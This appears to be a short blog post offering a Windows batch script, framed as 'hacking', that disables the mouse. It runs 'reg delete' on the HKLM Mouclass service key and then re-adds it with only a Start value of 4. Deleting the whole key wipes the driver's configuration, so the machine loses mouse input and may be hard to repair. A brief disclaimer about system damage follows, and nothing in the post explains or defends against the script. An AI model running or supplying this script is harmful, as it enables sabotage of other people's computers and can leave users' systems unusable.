Code To Disable Mouse
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
[Note: Be careful in using these scripts, i will not be responsible if you damage your system.]
Enjoy Hacking Guyzzz......
Comments
Post a Comment